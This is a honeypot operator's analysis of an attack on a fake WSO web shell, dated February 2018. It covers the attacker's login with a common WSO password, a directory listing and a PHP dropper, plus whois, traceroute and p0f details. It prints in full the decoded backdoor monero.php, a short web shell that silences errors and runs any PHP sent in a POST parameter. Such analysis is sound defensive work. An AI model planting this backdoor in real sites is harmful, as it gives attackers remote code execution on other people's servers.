Downloaded to my WordPress honey pot's fake WSO web shell. Downloader used the "Php" action of WSO, which is seeminly intended for interactive PHP evaluation by a human user of WSO web shells.
213.231.57.232 did 3 HTTP accesses of the fake WSO web shell:
- GET, 23/Feb/2018:09:46:11 -0700, got the WSO login page.
- POST, 23/Feb/2018:09:46:42 -0700, sent "nhzgrf" a common password for WSO
- POST, 23/Feb/2018:09:46:55 -0700, did a "FilesMan" listing on "/"
- POST, 24/Feb/2018:14:13:48 -0700, sent the dropper code to WSO, "Php" action.
The timing indicates interactive use by a real human. Glory be!
213.231.57.232 has DNS name 213.231.57.232.pool.breezein.net.
DNS name 213.231.57.232.pool.breezein.net matches 213.231.57.232, so that's all good.
whois says that address is associated with a "Docsis" ISP in Odessa, Ukraine:
organisation: ORG-TT21-RIPE
org-name: TOV TRK "Briz"
org-type: LIR
address: Bocharova street 2
address: 65111
address: Odessa
address: UKRAINE
traceroute confirms:
traceroute to 213.231.57.232 (213.231.57.232), 30 hops max, 60 byte packets
1 129-45-246-162.versonetworks.net (162.246.45.129) 71.201 ms 71.173 ms 71.126 ms
2 10.100.100.1 (10.100.100.1) 73.572 ms 73.526 ms 73.526 ms
3 v231.core1.den1.he.net (216.66.73.25) 83.652 ms 83.628 ms 83.601 ms
4 100ge14-1.core1.mci3.he.net (184.105.64.50) 86.246 ms 86.239 ms 86.195 ms
5 100ge8-1.core2.chi1.he.net (184.105.81.210) 121.137 ms 121.100 ms 121.098 ms
6 100ge16-1.core1.nyc4.he.net (184.105.223.162) 121.098 ms 59.768 ms 59.763 ms
7 100ge4-1.core1.par2.he.net (184.105.81.78) 129.763 ms 158.545 ms 158.546 ms
8 100ge5-2.core1.vie1.he.net (184.105.65.6) 143.441 ms 153.737 ms 153.727 ms
9 100ge14-1.core1.waw1.he.net (184.105.65.74) 158.467 ms 158.457 ms 165.934 ms
10 az-international-llc.10gigabitethernet1-6.core1.waw1.he.net (216.66.84.118) 165.932 ms 171.287 ms 171.282 ms
11 194.44.212.253 (194.44.212.253) 171.273 ms 173.254 ms 168.568 ms
12 194.44.6.130 (194.44.6.130) 173.596 ms 173.591 ms 247.634 ms
13 213.231.57.232.pool.breezein.net (213.231.57.232) 237.339 ms 237.323 ms 232.589 ms
p0f3 identifies the IP address as "Windows 7 or 8":
[2018/02/23 09:46:11] mod=syn|cli=213.231.57.232/57621|srv=162.246.45.144/80|subj=cli|os=Windows 7 or 8|dist=10|params=none|raw_sig=4:118+10:0:1440:8192,2:mss,nop,ws,nop,nop,sok:df,id+:0
The initial PHP is a file dropper. It appears to pick a random directory
somewhere under Apache's DocumentRoot directory, then decode a Base64 encoded
string into a file named monero.php.
The dropper code reports the final URL to the downloader, something like:
p_url_to_check: http://infectedhost.com/blah/blah/monero.php
"monero.php" seems like an odd name to pick, as Monero is current (February, 2018) gaining credence as the cryptocurrency of choice for cybercrime.
monero.php would contain a simple back door:
<?php
header("Cache-Control: tect");
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_POST["x"]))
{
eval($_POST["x"]);
}
?>
That is, an HTTP POST to monero.php would cause any PHP code associated with
a POST parameter named x to get evaluated. I'm not sure what the
"Cache-Control: tect" HTTP header is supposed to do. There's not even a
"Cache-Control: text" HTTP header, much less "tect". That header doesn't seem
to bother Firefox version 58 on Linux.
This code appears on Pastebin, dated April 4th, 2017.